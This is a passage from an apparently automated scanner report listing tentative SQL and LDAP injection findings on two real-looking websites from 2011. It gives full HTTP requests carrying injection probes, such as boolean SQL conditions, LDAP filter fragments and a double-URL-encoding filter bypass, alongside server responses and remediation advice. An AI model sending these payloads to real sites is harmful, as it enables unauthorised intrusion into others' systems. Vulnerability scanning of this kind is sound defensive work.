...[SNIP]...

1.11. http://htcwiki.wetpaint.com/page/reset+password+for+my+cingular+8125 [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/reset+password+for+my+cingular+8125

Issue detail

The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 18609109'%20or%201%3d1--%20 and 18609109'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/reset+password+for+my+cingular+8125 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:05:58 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKnX33iuXhXee; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=AE20ED40A75BF632BC7ED48CB3C37C04; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:58 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HO
...[SNIP]...

Request 2

GET /page/reset+password+for+my+cingular+8125 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:05:59 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKmXQVXoFXMNs; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:59 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"WIKI_SKIN" : 'meadowgreen',"WIKI_S
...[SNIP]...

1.12. http://htcwiki.wetpaint.com/page/t8282+operating+system [WPC-action cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/t8282+operating+system

Issue detail

The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/t8282+operating+system HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:44 GMT
Server: Apache
Set-Cookie: wab=joinButton=24; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRlTemit3XzC9; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=E29016370988C60F1E3EEBA8BAB0725D; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:44 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 40934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>t8282 operating system - HTC Smartphone Wiki</title>

   <meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"N
...[SNIP]...

Request 2

GET /page/t8282+operating+system HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:44 GMT
Server: Apache
Set-Cookie: wab=joinButton=95; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRr9r2MjsGHTx; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:44 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 40934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>t8282 operating system - HTC Smartphone Wiki</title>

   <meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki'
...[SNIP]...

1.13. http://web.survey-poll.com/tc/CreateLog.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.survey-poll.com
Path:   /tc/CreateLog.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tc%2527/CreateLog.aspx HTTP/1.1
Host: web.survey-poll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Content-Length: 1758
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 16:29:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...
<h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br>
...[SNIP]...

Request 2

GET /tc%2527%2527/CreateLog.aspx HTTP/1.1
Host: web.survey-poll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 400 Bad Request
Connection: close
Date: Sat, 05 Feb 2011 16:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html

<html><body>Bad Request</body></html>

2. LDAP injection  previous  next
There are 8 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://htcwiki.wetpaint.com/page/HTC+ALPINE [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/HTC+ALPINE

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /page/HTC+ALPINE HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:02:25 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPKI20TtYbsJm; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=E58B38A7E034A4FD9D63E96B232CD545; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:02:25 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 43249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Alpine - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wi
...[SNIP]...

Request 2

GET /page/HTC+ALPINE HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:02:26 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPBTPa46o3vcX; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:02:26 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 43248

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Alpine - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"WIKI_SKIN" : 'meadowgr
...[SNIP]...

2.2. http://htcwiki.wetpaint.com/page/HTC+BLUE+ANGEL [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/HTC+BLUE+ANGEL

Issue detail

The wetst cookie appears to be vulnerable to LDAP injection attacks.

The payloads 35377aaaf664e1c3)(sn=* and 35377aaaf664e1c3)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:43 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6napQKp+AHS; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=62AF78062B691081ABF216F8E028B2C6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:43 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Blue Angel - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Sm
...[SNIP]...

Request 2

GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:44 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6boEIAXRvZr; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:44 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57727

